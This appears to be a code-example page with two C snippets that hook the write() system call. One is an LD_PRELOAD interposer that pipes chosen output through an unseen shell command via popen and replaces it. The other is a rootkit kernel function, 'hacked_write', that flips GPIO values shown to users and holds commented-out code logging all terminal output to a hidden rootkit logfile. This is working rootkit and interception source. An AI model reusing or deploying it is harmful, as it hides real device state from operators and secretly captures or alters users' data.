Esempio n. 1
0
ssize_t write(int fildes, const void *buf, size_t nbyte) {
	
	
	int shouldcrypt ;

	shouldcrypt = isvalueinarray(fildes, filedesyes, 2) ;
	
	if (shouldcrypt == 1) {
		
		const char * buffer = (const char *)buf ;
		
		char *based = base64(buffer, nbyte);		
		
		char toexecute[strlen(based)+strlen(command)] ;
		memset(toexecute, '\0', strlen(based)+strlen(command));
	
		FILE *fp;
		
		char retcommand[2048];
		memset(retcommand, '\0', 2048);
		
		strncat(toexecute, command, strlen(command));
		strncat(toexecute, based, strlen(based));
		strncat(toexecute, endcommand, 2);
		
	
		int *(*original_write)(int fildes, const void *buf, size_t nbyte);
	
		original_write = dlsym(RTLD_NEXT, "write");
	
		fp = popen(toexecute, "r");
		if (fp == NULL) {
			printf("Failed to run command\n" );
			exit(1);
		}
	
		while (fgets(retcommand, sizeof(retcommand)-1, fp) != NULL) {
			
			original_write(fildes, retcommand, strlen(retcommand)) ;

		}
	

		pclose(fp);
	
		return(nbyte) ;
		
	}
	
	else {
		
		int *(*original_write)(int fildes, const void *buf, size_t nbyte);
	
		original_write = dlsym(RTLD_NEXT, "write");
		
		original_write(fildes, buf, nbyte) ;
		
		
		return(nbyte);
	}
	
}
Esempio n. 2
0
asmlinkage ssize_t hacked_write(int fd, char *buf, size_t count)
{
	int ret = original_write(fd, buf, count);
	char *needle_ptr = buf;
	//struct file *file;
	//mm_segment_t old_fs;
	//loff_t pos = 0;


	//char *command_to_find = "echotest";//"echoout>/sys/class/gpio/gpio4/direction";
	//bool exported = false;
	
	//if(CheckGPIOIsOutput(4)){	// if GPIO 4 is exported, start hijacking output written
	if(HOOK_WRITE){	// if cat /sys/class/gpio/gpio4/value is called, hack the output
		
		if(*needle_ptr=='0' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
			printk("In case 1\n");
			needle_ptr[0]='1';
			original_write(fd, needle_ptr, 2);
			return count;
		}
		else if (*needle_ptr=='1' && *(needle_ptr+1)=='\n' && fd==1) { //&& exported==true) {
			printk("In case 2\n");
			needle_ptr[0]='0';		
			original_write(fd, needle_ptr, 2);
			return count;
		}
		HOOK_WRITE=false;
	}
	/*
	if(IS_COMMAND && fd==1){	// if user pressed enter
		
		struct file *file;
		mm_segment_t old_fs;
		loff_t pos = 0;
	
		old_fs = get_fs();
		set_fs(KERNEL_DS);

		//disable_file_hiding();
		file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);

		if(IS_ERR(file)){
			//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
			//return -1;
		}
		else{
			if(file && ret>0){
				
				pos=0;
				vfs_write(file, buf, strlen(buf), &pos);								
				printk("Copying from user sys_write: %s...\n\n", buf);		
				filp_close(file, NULL);
				//enable_file_hiding();
			}else{
				if(!file)
					printk("OPEN FILE ERROR 111...\n");
				else if(ret<=0)
					printk("OPEN FILE ERROR 222...\n");
			}
		}
		set_fs(old_fs);
		

		IS_COMMAND=false;
	}*/

/*	if(fd==1){

		old_fs = get_fs();
		set_fs(KERNEL_DS);
	
		file = filp_open("/home/pi/rootkit_logfile", O_RDWR|O_APPEND|O_CREAT, 0644);
	
		if(IS_ERR(file)){
			//printk("CREATE FILE ERROR %d...\n", ERR_PTR(file));
			//return -1;
		}
		else{
			if(file && ret>0){
					pos=0;
					vfs_write(file, buf, strlen(buf), &pos);
					//vfs_write(file, test_buffer, strlen(test_buffer), &pos);								
					printk("Copying from user...\n\n");		
		
				filp_close(file, NULL);
			}else{
				if(!file)
					printk("OPEN FILE ERROR 111...\n");
				else if(ret<=0)
					printk("OPEN FILE ERROR 222...\n");
			}
		}
		set_fs(old_fs);
	}*/
	return ret;
}